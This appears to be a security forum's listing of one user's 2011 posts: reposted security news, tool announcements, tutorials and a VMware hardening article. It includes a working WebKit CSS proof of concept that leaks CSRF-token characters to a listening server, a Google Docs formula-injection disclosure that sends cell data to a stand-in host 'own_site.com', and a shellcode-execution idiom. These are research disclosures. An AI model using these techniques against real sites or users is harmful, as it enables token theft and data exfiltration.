Nytro - Posts: 18725 - Days Won: 706
Everything posted by Nytro
-
Securitytube Metasploit Framework Expert ( Armitage )
Description: This video, part of the SecurityTube Metasploit Framework Expert series, introduces Armitage. You'll learn the basic use of Armitage and see a demonstration. This video also covers some of the advanced features: dynamic workspaces, team collaboration, and reporting.
Source: Securitytube Metasploit Framework Expert ( Armitage )
Yes, a tutorial about Armitage...
-
Execute Binary In The Alternate Data Stream
A simple and possibly useful trick.
Description: Since Vista the start command is forbidden for ADS. Here is a workaround.
Source: Execute Binary In The Alternate Data Stream
-
How Not To Implement Cryptography For The Owasp Top 10
Description: How NOT to Implement Cryptography for the OWASP Top 10 (Reloaded) with Anthony J. Stieber
Source: How Not To Implement Cryptography For The Owasp Top 10
-
Backdoor in Android for No-Permissions Reverse Shell
Security expert Thomas Cannon, working at viaForensics as the Director of R&D, has demonstrated a custom-developed app that installs a backdoor in Android smartphones – without requiring any permissions or exploiting any security holes.
Thomas built an app which requires no permissions and yet is able to give an attacker a remote shell and allow them to execute commands on the device remotely from anywhere in the world. The functionality they are exploiting to do this is not new; it has been quietly pointed out for a number of years, and was explained in depth at Defcon 18. It is not a zero-day exploit or a root exploit. They are using Android the way it was designed to work, but in a clever way in order to establish a 2-way communication channel. This has been tested on Android versions ranging from 1.5 up to 4.0 Ice Cream Sandwich, and it works in a similar way on all platforms.
The application operates by instructing the browser to access a particular web page with specific parameters. This web page, and the server behind it, will, in turn, control the app by forwarding the browser to a URL that starts with a protocol prefix that is registered as being handled by the app, for example app://. This process can then be repeated and in doing so it enables two-way communication.
"In this demonstration Android's power and flexibility were perhaps also its downfall. Other smartphone platforms may not offer the controls we are bypassing at all, and the multi-tasking capabilities in Android allowed us to run the attack almost transparently to the user. This power combined with the open nature of Android also facilitates the customisation of the system to meet bespoke security requirements. This is something we have even been involved in ourselves by implementing a proof of concept Loadable Kernel Module to pro-actively monitor and defend a client's intellectual property as it passed through their devices. It is no surprise that we have seen adoption of Android research projects in the military and government as it can be enhanced and adapted for specific security requirements, perhaps like no other mobile platform before it." Thomas Cannon said.
Source: Backdoor in Android for No-Permissions Reverse Shell | The Hacker News (THN)
-
CSS - The Sexy Assassin
Tactical Exploitation using CSS
Old Attacks
New Research
New Attacks
Download: http://www.megaupload.com/?d=2E0FY6BJ
Of interest:
Access DOM attributes using CSS:
This example is just a very simple proof of concept -- showing that we can enumerate arbitrary attribute value characters. It performs five positive tests and one negative test. Just to be sure.
Now, what happens here? First of all you see an animation, resizing a pack of boxes. This is necessary because of a render bug in Webkit -- but not necessarily important for the attack itself. I just had to implement it because of a faulty dimensioning of boxes applied with external fonts.
So -- the essence of the attack is that we can map attribute content into the DOM by using CSS :after and content:attr(href) for example. This mapped attribute content can be styled with a custom font. The magic is in those fonts - each font is only supplied with one visible character - and all other characters having zero dimension. That means that only the dimensioned character will be displayed and all others won't.

@font-face { font-family: TestS; src: url(test_S.svg#TestS) format("svg"); }
@font-face { font-family: TestE; src: url(test_E.svg#TestE) format("svg"); }
@font-face { font-family: TestC; src: url(test_C.svg#TestC) format("svg"); }
@font-face { font-family: TestR; src: url(test_R.svg#TestR) format("svg"); }
@font-face { font-family: TestZ; src: url(test_Z.svg#TestZ) format("svg"); }
@font-face { font-family: TestT; src: url(test_T.svg#TestT) format("svg"); }
div {
    border: 1px solid red;
    height: 20px;
    overflow-x: none;
    overflow-y: auto;
    -webkit-animation-duration: 5s;
    -webkit-animation-name: decrease;
}
div a:after { color: white; }
div.a a:after { content: attr(href); font-family: TestS; }
div.b a:after { content: attr(href); font-family: TestE; }
div.c a:after { content: attr(href); font-family: TestZ; }
div.d a:after { content: attr(href); font-family: TestT; }
div.e a:after { content: attr(href); font-family: TestC; }
div.f a:after { content: attr(href); font-family: TestR; }

So -- only if a character existing in that font is part of the attribute value, the mapped content will have dimension. If we squeeze the box a bit, we will get a scrollbar. But only if the font-character match is given.
This is one of those magic "only one char has dimension" fonts I created for the PoC, testing for the letter S: http://html5sec.org/webkit/test_S.svg
That "one char only dimension" thing connected with the squeezing means, if we can find out when the scrollbar appears, we can know which character is part of the attribute value.
Now - how can we create a scrollbar that is able to notify an external resource the second it starts to appear? Well, Webkit has a special feature that allows to fully style scrollbars. We can of course also define a background image for a scrollbar. Too bad is just, that if we do that, the image will be fetched onload. So it's more or less useless.
But -- Webkit also supports tons of pseudo classes for scrollbar styles (srsly - tons: http://trac.webkit.org/export/41842/trunk/LayoutTests/scrollbars/overflow-scrollbar-combinations.html - I mean, you know it already I assume). And some of those make sure that background images assigned to the selected elements and states will only be loaded once they actually appear. Bam -- there we have our smart scrollbar of doom.

div::-webkit-scrollbar { width: 12px; }
div.a::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/S); }
div.b::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/E); }
div.c::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/Z); }
div.d::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/T); }
div.e::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/C); }
div.f::-webkit-scrollbar-track-piece:vertical:increment { background: red url(/R); }

Now if we glue the whole thing together, we simply need the following ingredients:
* A CSS injection
* Some or two CSRF protected links with a token
* One SVG font per character to determine
* A server listening for incoming requests
The SVG fonts were chosen since they are insanely easy to create. Just set the path and some attributes of any glyph but the desired one to null and done -- we have the perfect font where every character but one is invisible.
The animation has to be there because of the aforementioned dimensioning bug - if there's no animation, the background image requests will fire even for those character tests which don't result in a visible character.

@-webkit-keyframes decrease {
    from { width: 340px; }
    50% { width: 105px; }
    100% { width: 340px; }
}

To fully enjoy the demo, make sure you have a look at the Network tab in the developer tools. You'll see requests for the characters S,E,C,R,T - but none for Z. Z was referenced in the demo with a dedicated test as well. This is our negative test proving that it really works.
So - conclusion: We can enumerate characters via CSS -- that is not new since SDC et al. did this with the Sexy Assassin back in 2009 (was it?). With Webkit nevertheless we can do it FAST and without a massive footprint.
My suggestion for a fix would be: simply make sure that scrollbars and their numerous components and states cannot request external resources once they appear/change state -- but fetch their stuff onload so we can avoid attacks like these. The only thing making this attack work is the fact that some parts of the scrollbar load data from an external machine on visibility/appearance -- and not on declaration in the style-sheet.
Source: http://html5sec.org/webkit/test
-
Excel formula injection in Google Docs
December 21, 2011
Surely all of you know about the Google reward program for information security researchers who provide information about weak spots of Google resources. We had the chance to participate in this program, too. Here is a short story from @_chipik and @asintsov.
One day we needed to conduct a small survey, and we decided to use Google Docs as the platform for the survey. There is an object in Google Docs called Google Forms, and, as is obvious from the name, it is used to create various surveys and test forms. After a form is created, its URL is published on the Internet or sent to people who are to participate in the survey.
This is how the form looks for a participant:
And this is how the author sees the participant's answers:
I suppose that any web researcher upon seeing a form instinctively puts ',",> and other interesting symbols there? We tried it, too. However, everything was encoded and filtered exactly as planned. Well...
But all of the user input is inserted into an Excel table, so why don't we try to inject some formula? Excel formulas start with an "=". OK, let's give it a try. Fail. Cunning Google puts a space symbol before the "=" so that the formula is taken for a simple text cell. So how do we get rid of the space? Easy as pie: use backspace. %08 is the hex code of the backspace key. Thus, we wrote in the entry field:
%08=1+2+C3
Voila! The formula got inserted into the table just fine. All we had to do now was devise an interesting and practical vector for this particular injection. Google Functions helped us here. With the help of Google Functions it was possible to execute a request to any domain so that the request results got inserted into a specified cell. That gave us the following attack vector:
1) Put sensitive user data into cell A1 (or probably they are already there)
2) Put a formula which makes a GET request to http://own_site.com/secret_data_in_base64 into cell Z666.
3) Read web server logs, get data from cells.
4) Profit!
Soon after describing the bug and the possible attack vector we got the following letter:
And a bit later we saw our names in the Google Hall of Fame.
Finally, a little Google Hack
Posted by DSecRG
Source: Digital Security Research Group: Excel formula injection in Google Docs
-
Metasploit Tutorial: An introduction to Metasploit Community
Nytro posted a topic in Tutoriale video
Posted by Christian Kirsch on Dec 21, 2011 7:50:48 AM
Marcus J. Carey put together some great Metasploit Tutorial videos about Metasploit Community that I want to share with you. Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners such as Nexpose – for free. You can view these videos to get started with Metasploit Community, or to get a first impression of the product.
- Scanning Networks with Metasploit Community
- Basic Exploitation with Metasploit Community
- Basic Exploitation vs. Smart Exploitation
- Importing Nexpose Scan Data into Metasploit
- Using Metasploit Community with Nexpose
If you don't have them already, download the free Metasploit Community Edition penetration testing tool and the free Nexpose Community Edition vulnerability scanner now!
Videos: https://community.rapid7.com/community/solutions/metasploit/blog/2011/12/21/metasploit-tutorial-an-introduction-to-metasploit-community
-
Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1
A developer who calls himself T Rizk doesn't have much faith in Congress making the right decision on anti-piracy legislation, so he's built a work around for the impending censorship measures being considered: DeSOPA.
The Firefox add-on is stunningly simple as the Stop Online Piracy Act (SOPA) would block specific domain names (e.g. Download music, movies, games, software! The Pirate Bay - The world's most resilient BitTorrent site) of allegedly infringing sites. Firefox, which already boasts an outspoken stance against SOPA, and has already shown they are willing to stand by add-on developers who create circumvention extensions designed to go around measures currently employed by Homeland Security, has welcomed a new add-on, one that is designed to circumvent whatever SOPA website blacklists that are created, provided the bills become law.
A new anti-SOPA add-on for Firefox, titled "DeSopa", is such a counter measure. When installed, users can click a single button to resolve a blocked domain via foreign DNS servers, bypassing all domestic DNS blockades and allowing the user to browse the site through the bare IP address (if supported).
"I feel that the general public is not aware of the gravity of SOPA and Congress seems like they are about to cater to the special interests involved, to the detriment of the Internet, for which I and many others live and breathe," DeSopa developer T Rizk told. "It could be that a few members of congress are just not tech savvy and don't understand that it is technically not going to work, at all. So here's some proof that I hope will help them err on the side of reason and vote SOPA down," he adds.
If SOPA is implemented, thousands of similar and more innovative programs and services will sprout up to provide access to the websites that people frequent. SOPA is a mistake. It does not even technically help solve the underlying problem, as this software illustrates. What it will do is give undue leverage to predatory organizations, cripple innocent third party websites, severely dampen digital innovation and negatively impact the integrity and security of the Internet.
If browsing a site through a single IP address is not supported, this other anti-SOPA plugin provides an alternative.
Source: Bypass SOPA (Stop Online Piracy Act) DNS Blocking with DeSopa 1.1 | The Hacker News (THN)
-
Hunting malware with Volatility v2.0
Frank Boldewin
CAST Forum December 2011 (English edition)
What is Volatility?
- Forensics framework to acquire digital artifacts from memory dumps
- Completely written in Python
- Current stable version is 2.0.1
- Easy to use plugin interface
- Supports the following x86 Windows versions:
  - Windows XP SP 2, 3
  - Windows 2003 Server SP 0, 1, 2
  - Windows Vista SP 0, 1, 2
  - Windows 2008 Server SP 1, 2
  - Windows 7 SP 0, 1
Download: http://reconstructer.org/papers/Hunting%20malware%20with%20Volatility%20v2.0.pdf
Source: CAST Slides: Hunting malware with Volatility v2.0 | Offensive Computing
-
A simple HTML tag will crash 64-bit Windows 7
0-day leaves kernel in the wrong iframe of mind
By John Leyden
An unpatched critical flaw in 64-bit Windows 7 leaves computers vulnerable to a full 'blue screen of death' system crash. The memory corruption bug in x64 Win 7 could also allow malicious kernel-level code to be injected into machines, security alert biz Secunia warns.
Fortunately the 32-bit version of Windows 7 is immune to the flaw, which has been pinned down to the win32k.sys operating system file - which contains the kernel portion of the Windows user interface and related infrastructure.
Proof-of-concept code showing how to crash vulnerable Win 7 boxes has been leaked: the simple HTML script, when opened in Apple's Safari web browser, quickly leads to the kernel triggering a page fault in an unmapped area of memory, which halts the machine at a blue screen of death. The offending script is just an IFRAME tag with an overly large height attribute.
Although Safari is required to spark the system crash via HTML, modern operating systems should not allow usermode applications to bring down the machine.
Microsoft is now investigating the vulnerability, which was first reported by Twitter user w3bd3vil, although the software giant is racing against hackers tracing the code execution path to discover the underlying vulnerability in Windows 7. A video of the Safari-triggered crash along with the HTML PoC can be . Other exploit scenarios might also be possible.
Demo:
Source: A simple HTML tag will crash 64-bit Windows 7 • The Register
More info: http://www.pcworld.com/businesscenter/article/246767/new_zeroday_vulnerability_in_windows_7_64bit_may_allow_remote_code_execution.html
-
SSLyze: A Fast and Full-Featured SSL Scanner!
by Mayuresh on December 21, 2011
When we wrote the "list of SSL scanners for penetration testers" post, in August this year, little did we know that we would have to update it this soon. We have since updated the list with SSLyze, a fast and full featured SSL scanner. It is brought to us by iSEC Partners. SSLyze is a stand-alone Python application that looks for classic SSL mis-configurations, while providing the advanced user with the opportunity to customize the application via a simple plugin interface. This open source, cross-platform tool will help you with analyzing the configuration of SSL servers and for identifying mis-configurations such as the use of outdated protocol versions, weak hash algorithms in trust chains, insecure renegotiation, and session resumption settings.
Features of SSLyze:
- Insecure renegotiation testing
- Scanning for weak strength ciphers
- Checking for SSLv2, SSLv3 and TLSv1 versions
- Server certificate information dump and basic validation
- Session resumption capabilities and actual resumption rate measurement
- Support for client certificate authentication
- Simultaneous scanning of multiple servers, versions and ciphers
For example, SSLyze can help users identify server configurations vulnerable to THC's recently released SSL DOS attack, by checking the server's support for client-initiated re-negotiations.
As we have already mentioned, it is cross-platform. It supports 64-bit and 32-bit Windows and Linux operating systems. All it needs is the following sets of packages:
Windows: Python 2.6 or 2.7 and OpenSSL 1.0.0c
Linux: Python 2.6 or 2.7 and OpenSSL 0.9.8+
Install SSLyze:
# yum install python26 openssl
# wget http://sslyze.googlecode.com/files/sslyze-0.3_src.zip
# unzip sslyze-0.3_src.zip
# cd sslyze-0.3_src
SSLyze usage:
$ python sslyze.py [options] www.target1.com www.target2.com:443
It supports the following options to provide granular control:
- Regular Scan "--regular": Performs a regular scan. It's a shortcut for --sslv2 --sslv3 --tlsv1 --reneg --resum --certinfo=basic.
- OpenSSL Cipher Suites "--sslv2", "--sslv3", "--tlsv1": Lists the SSL 2.0 / SSL 3.0 / TLS 1.0 OpenSSL cipher suites supported by the server.
- Session Renegotiation "--reneg": Checks whether the server is vulnerable to insecure renegotiation.
- Session Resumption "--resum": Tests the server for session resumption support, using both session IDs and TLS session tickets (RFC 5077).
- Session Resumption Rate "--resum_rate": Estimates the average rate of successful session resumptions by performing 100 session resumptions.
- Server Certificate "--certinfo=basic": Verifies the server's certificate validity against Mozilla's trusted root store, and prints relevant fields of the certificate.
Additional options providing client certificate support and connection timeout variables are also available.
Download SSLyze:
SSLyze v0.3 – sslyze-0.3_src.zip – Downloads - sslyze - Fast and Full-Featured SSL Scanner - Google Project Hosting
Source: SSLyze: A Fast and Full-Featured SSL Scanner! — PenTestIT
-
Reversing Microsoft patches to reveal vulnerable code
Harsimran Walia
Computer Security Enthusiast
The paper would try to reveal the vulnerable code for a particular disclosed vulnerability, which is the first and foremost step for making an undisclosed exploit and for patch verification. The process used herein could be used to create vulnerability based signatures which are far better than exploit signatures. A vulnerability signature is a superset of all the inputs satisfying a particular vulnerability condition, whereas an exploit based signature would only cater to one type of input satisfying that vulnerability condition.
This paper would try to pinpoint the vulnerable code and the files in Microsoft products by reverse engineering the Microsoft patches. The method used would be to take a binary difference of the file which was patched taken at two different instances, one is the most recent file before patching and the second is after applying the patch, but finding the two files is in itself another problem. Windows now releases two different versions of patches, GDR (General Distribution Release) which contains only security related updates and the other QFE (Quick Fix Engineering) or LDR (Limited Distribution Release) which has both security related and functional updates. The problem addressed is that the versions of the two files to be compared should match, that is either both should be GDR or LDR. The file after patching can be obtained by extracting the patch of the considered vulnerability. The second file to be compared, with a matching version with the first one, could be extracted from some other vulnerability patch addressing the issue with the same software disclosed just before the vulnerability considered. The process of extraction of files from patches differs in Vista and Windows 7 from the traditional way used in Windows XP.
After obtaining the correct files to be compared, the next step would be to get a binary difference between the files, which can be done very easily and effectively with the use of a tool called DarunGrim. The tool provides a well illustrated difference between the subroutines in terms of the percentage match between them. Subroutines from both the files can be viewed in graph mode and can be compared to find the vulnerability. The change in the code is done to fix that particular vulnerability, which may be removal of a piece of code and addition of another. Another problem that arises at this point is that compiler optimizations happen every time code is compiled, so if both the files are compiled with different compilers or compiler versions, they would have different compiler optimizations and that would also show up as a change in code. Simple instruction reordering keeps happening over different releases, which gives rise to another problem: when only the instructions are reordered, it would still show up as changed code. The code change in one of the functions out of several functions in the file before applying the patch would be the vulnerable code. From here the knowledge of the reverse engineer would come into play as to how effectively and fast he can find the vulnerability from the code shown as being changed from the previous file.
Till now the process used was static analysis, but from now onwards dynamic analysis would be used as breakpoints could be set at these changed functions and the software run. When a breakpoint is hit we can check in which of the functions user input is being dealt with. Obtaining all this information can then be used to write an exploit. This process of reversing the patch and finding the details about the vulnerability would definitely help in creating vulnerability signatures.
Download: http://nullcon.net/nullcon2011presentation/harsimranwalia_nullcon.pdf
-
libemu – x86 Shellcode Emulation
libemu is a small library written in C offering basic x86 emulation and shellcode detection using GetPC heuristics. It is designed to be used within network intrusion/prevention detections and honeypots.
libemu supports:
- Executing x86 instructions
  - Reading x86 binary code
  - Register emulation
  - Basic FPU emulation
- Shellcode execution
- Shellcode detection
  - Using GetPC heuristics
  - Static analysis
  - Binary backwards traversal
- Win32 API hooking
With libemu one can:
- Detect shellcodes
- Execute the shellcodes
- Profile shellcode behaviour
Download: http://sourceforge.net/projects/nepenthes/files/libemu%20development/0.1.0/
Source and Info: libemu – x86 Shellcode Emulation
-
It's useful when you see some uglier syntax and you're too lazy to rearrange the code to understand it.
(*(void(*)()) SC)();
-
Great, something in Romanian... Something in English: MEGAUPLOAD - The leading online storage and file delivery service
-
I'm no expert, but I think you (necessarily) had to jailbreak it.
-
I recommend you focus on a single language, 2 at most: one programming language - C++ and one scripting/Web language - PHP. But C# is also useful if you want to make something quick and easy. Welcome.
-
Lamer email: h4ck3r@expect-us.net
Contact form without CAPTCHA, probably vulnerable to CRLF: Contact
1337 grammar: "Tutorialz"
Pathetic menu made with who knows what junk: "Gooey Menu script"
The design consists of some tables like we made in 9th grade.
In short: crap.
-
To submit, choose one of the variants:
<form id="form" name="send" action="http://www.google.ro/" method="post">
<input type="text" name="2"/>
<input name="buton" id="btn" type="submit" value="Submit" />
</form>
<script>
document.forms[0].submit();
document.send.submit();
document.getElementById("form").submit();
// Or press the button
document.forms[0].buton.click();
document.send.buton.click();
document.getElementById("btn").click();
</script>
To submit after 2 seconds:
<script>
// Function that submits
function Dupa2Secunde() {
    document.forms[0].submit();
}
// Call once, after 2 seconds (setTimeout, not setInterval, which would repeat every 2 seconds)
setTimeout(Dupa2Secunde, 2000);
</script>
-
Metasploit on Amazon Kindle
December 18, 2011
Since Nmap and Ruby are working on Kindle (check my previous posts on how I've done that), the next step is Metasploit - of course! Let me tell you immediately, no patches to Metasploit are needed. You can run the full-blown version of Metasploit with Kindle's 256 MB of RAM, but don't expect miracles.
Download
http://ftp.linux.hr/kindle/ruby-1.9.3-p0-kindle-bin.tar.bz2
http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
Install
Create the opt directory and extract the files there:
mkdir /mnt/us/opt && cd /mnt/us/opt
tar xvjf ruby-1.9.3-p0-kindle.tar.bz2
tar xvjf framework-latest.tar.bz2
Test that you have the following directory structures:
/mnt/us/opt/msf/
/mnt/us/opt/ruby-1.9.3-p0/
export HOME=/mnt/us
and run metasploit:
cd /mnt/us/opt/msf3/
../ruby-1.9.3-p0/bin/ruby msfconsole
I have made a small script in /mnt/us/opt which starts msf, so I don't have to do it every time. It's straightforward:
#!/bin/sh
export HOME=/mnt/us
cd /mnt/us/opt/msf
../ruby-1.9.3-p0/bin/ruby msfconsole
Let me know if it works for you!
Source: Metasploit on Amazon Kindle
-
Remove passwords and restrictions from secured PDF files
PDFUnlock! is a free web site that removes restrictions from PDF files.
Link: http://www.pdfunlock.com/
I don't know if it works, try it if you need it.
-
Download Firefox 9.0 Final for Linux
December 20th, 2011, 07:35 GMT · By Marius Nestor
Mozilla unofficially released last evening, December 19th, the highly anticipated Mozilla Firefox 9.0 web browser for Linux, Mac OS X and Windows operating systems. There's no official announcement yet, but the binary and source archives of the final version of Mozilla Firefox 9.0 were made available for download on the official FTP site of the Mozilla company.
Highlights of Mozilla Firefox 9.0:
- Added Type Inference, radically improving the JavaScript performance;
- Do Not Track status can now be queried via JavaScript;
- font-stretch support was added;
- text-overflow support was improved;
- HTML5, CSS, and MathML support was improved;
- Various stability issues were fixed.
Download Firefox 9.0 for Linux binaries and sources right now from Softpedia. Also, don't forget to visit our always up-to-date Firefox Extensions section for the latest add-ons!
Download: http://linux.softpedia.com/get/Internet/HTTP-WWW-/Mozilla-Firefox-8-20864.shtml
Source: Download Firefox 9.0 Final for Linux - Softpedia
-
Attacking NoSQL and Node.js: Server-Side JavaScript Injection (SSJS)
Jeff Darcy has written a while back about the (lack of) security in NoSQL databases. Unfortunately things haven't changed much and if you check the NoSQL + Node.js applications I've posted lately you'll notice that some of them are completely ignoring security. And there are some people realizing the risks and starting to express their concerns:
"Playing with MongoDB lately, I'm getting scared. Because I'm seeing some really bad practices out there. Seeing it in live code. In tutorials."
Bryan Sullivan (Senior Security Researcher, Adobe Secure Software Engineering Team) has published a paper (PDF) explaining some of the possible server-side JavaScript injection attacks and the risks the apps and the data are exposed to. Teaser: he can do pretty much everything.
It should be noted that exploitation of server-side JavaScript injection vulnerabilities is more like that of SQL injection than of cross-site scripting. SSJS injection does not require any social engineering of an intermediate victim user the way that reflected XSS or DOM-based XSS do; instead, the attacker can attack the application directly with arbitrarily created HTTP requests. Because of this, defenses against SSJS injection are also similar to SQL injection defenses:
- Avoid creating "ad-hoc" JavaScript commands by concatenating script with user input.
- Validate user input used in SSJS commands with regular expressions.
- Avoid use of the JavaScript eval command. In particular, when parsing JSON input, use a safer alternative such as JSON.parse.
Remember there's no such thing as security through obscurity.
Source: Attacking NoSQL and Node.js: Server-Side JavaScript Injection (SSJS) • myNoSQL
-
JPC is the fast pure Java™ x86 PC emulator
Use JPC to boot virtual computers right here in your browser....
JPC creates a virtual computer upon which you can install your favorite operating system in a safe, flexible and powerful way. It aims to give you complete control over your favorite PC software's execution environment, whatever your real hardware or operating system, and JPC's multi-layered security makes it the safest solution for running the most dangerous software in quarantine - ideal for protecting your machine from malicious or unstable software.
Read more about JPC - since its launch at JavaOne 2007, JPC can now boot many more operating systems (including graphical linuxes) and it's much faster.
Download: http://jpc.sourceforge.net/download_download.html
Source: JPC
-
[h=1]Virtual Machine Security - VMware Security Hardening[/h]

By Irfan Shakeel

Virtual machines are very common in the enterprise and even for home users; the most common are VMware and VirtualBox, and in both, security is an essential part. The security of a virtual machine is as important as the security of the host machine. Different hardening tips are available for virtual machines (VMware), and in this article we will discuss the basic security tips for VMware.

Virtualization is complex and there are many moving parts. I cannot speak to all the details of hardening a VMware environment, but I can speak to the minimum things to consider when installing or maintaining a VMware environment. For more advice, look at these documents:

- vSphere 4.0 Security Hardening Guide
- Security Configuration Benchmarks for VMware ESX 4
- PCI DSS Virtualization Guidelines
- A Guide to Virtualization Hardening Guides

[h=3]A Typical ESX Environment[/h]

A typical ESX environment will have one or more ESX servers connected to a shared storage system such as a Fibre Channel or iSCSI SAN. Each ESX server will have one or more guest operating systems, each with VMware Tools and a myriad of applications installed. This can be seen in the figure below:

In this environment there are three major areas of concern: the storage system, the ESX servers, and the guest operating systems.

[h=3]Storage Systems[/h]

Four things to think about with storage systems are data availability, traffic isolation, the security levels of the ESX servers sharing the storage system, and which ESX servers are allowed to see which data sets.

[h=4]Data Availability[/h]

Whatever storage system is used, Fibre Channel or iSCSI, ensure there are multiple data paths between the storage system and the ESX servers. This includes dual controllers on the SAN, dual switches, redundant power sources for the SAN, and dual host bus adapters (HBAs) on the ESX server. It is not enough to have a single HBA with dual ports; two HBAs are necessary. Before the system goes into production, test that a single device failure does not prevent the ESX server from accessing the data.

[h=4]Traffic Isolation[/h]

Traffic isolation is of particular concern in iSCSI systems because they use the same basic infrastructure as a standard network. All iSCSI traffic should be segmented from the rest of the network traffic to prevent an attacker from sniffing the iSCSI data. I am not a fan of using VLANs to segment traffic of differing security levels and always recommend physically segmenting iSCSI traffic from the rest of the network.

[h=4]Shared Storage for ESX Servers with Differing Security Levels[/h]

ESX servers at differing security levels are configured and maintained differently. An ESX server set up as a lab environment is not going to be hardened to the same level as an ESX server holding the company's production systems, and those two ESX servers should not share the same storage. An attacker who gained access to the weaker ESX server could use it to attempt to gain access to the production data on the shared storage system.

[h=4]Share Data Volumes with the Appropriate ESX Servers[/h]

On a typical SAN, multiple data volumes are configured and each one is assigned a SCSI logical unit number (LUN), which is used to uniquely identify that volume. The SAN can then be configured to allow only specific HBAs to access specific LUNs. As an example, in a group of ESX servers only two of those servers may need access to the LUN that holds the HR data; the SAN should be configured so only the HBAs in those two ESX servers have access to that LUN.

[h=3]Conclusion[/h]

As stated earlier, there are three major areas of concern with a production VMware environment: the storage system, the ESX servers, and the guest operating systems. I will discuss the latter two in upcoming blog entries. For now, remember to configure and test multiple paths to the data on the storage system, to isolate iSCSI traffic from the rest of the network, to keep ESX servers of differing security levels from sharing the same storage system, and to share data sets only with the appropriate ESX servers.

About the Author

Stephen has over ten years of experience in the information technology field, working as a programmer, technical trainer, network operations manager, and information security consultant. He holds a Bachelor of Science in Math and a number of industry certifications, including the Certified Information Systems Security Professional (CISSP), Offensive Security Certified Professional (OSCP), and GIAC Penetration Tester (GPEN).

Sursa: Virtual Machine Security - VMware Security Hardening | Ethical Hacking-Your Way To The World Of IT Security
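The three storage rules from the article above (two physical HBAs per ESX server, no storage system shared between servers of differing security levels, and LUNs masked only to the HBAs of the servers that need them) as a small inventory audit; this is an added example, not code from the article, and the host names, WWPN-style HBA identifiers and the HR-data LUN are constructed sample data.

```python
from dataclasses import dataclass

@dataclass
class EsxHost:
    name: str
    security_level: str  # e.g. "production" or "lab" (constructed labels)
    hbas: list           # physical HBA identifiers (constructed WWPN-like names)
    storage: str         # storage system the host is attached to

@dataclass
class Lun:
    lun_id: int
    description: str
    authorized_hosts: set  # ESX hosts that legitimately need this volume
    masked_to: set         # HBA identifiers the SAN actually exposes the LUN to

def audit(hosts, luns):
    """Return (severity, message) findings; an empty list means the inventory passes."""
    findings = []
    by_name = {h.name: h for h in hosts}
    hba_owner = {w: h.name for h in hosts for w in h.hbas}
    # Rule 1: two physical HBAs per host (dual ports on one card is not enough).
    for h in hosts:
        if len(set(h.hbas)) < 2:
            findings.append(("HIGH", f"{h.name}: single HBA, no redundant path to {h.storage}"))
    # Rule 2: one storage system must not serve hosts of differing security levels.
    levels = {}
    for h in hosts:
        levels.setdefault(h.storage, set()).add(h.security_level)
    for san, lv in levels.items():
        if len(lv) > 1:
            findings.append(("HIGH", f"{san}: shared by hosts of differing levels {sorted(lv)}"))
    # Rule 3: a LUN is masked only to HBAs of its authorized hosts, and to all of them.
    for lun in luns:
        exposed = {hba_owner.get(w, f"unknown-HBA:{w}") for w in lun.masked_to}
        extra = exposed - lun.authorized_hosts
        if extra:
            findings.append(("HIGH", f"LUN {lun.lun_id} ({lun.description}) visible to {sorted(extra)}"))
        missing = {w for a in lun.authorized_hosts for w in by_name[a].hbas} - lun.masked_to
        if missing:
            findings.append(("MEDIUM", f"LUN {lun.lun_id}: not masked to HBAs {sorted(missing)}"))
    return findings

HOSTS = [  # constructed inventory: a lab host wrongly attached to the production SAN
    EsxHost("esx-prod-01", "production", ["wwpn-01a", "wwpn-01b"], "san-prod"),
    EsxHost("esx-prod-02", "production", ["wwpn-02a", "wwpn-02b"], "san-prod"),
    EsxHost("esx-lab-01", "lab", ["wwpn-lab1"], "san-prod"),
]
LUNS = [Lun(10, "HR data", {"esx-prod-01", "esx-prod-02"},
            {"wwpn-01a", "wwpn-01b", "wwpn-02a", "wwpn-02b", "wwpn-lab1"})]
```

Running `audit(HOSTS, LUNS)` on this inventory reports the lab host's single HBA, the production SAN shared with a lab host, and the HR LUN exposed to the lab host's HBA.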
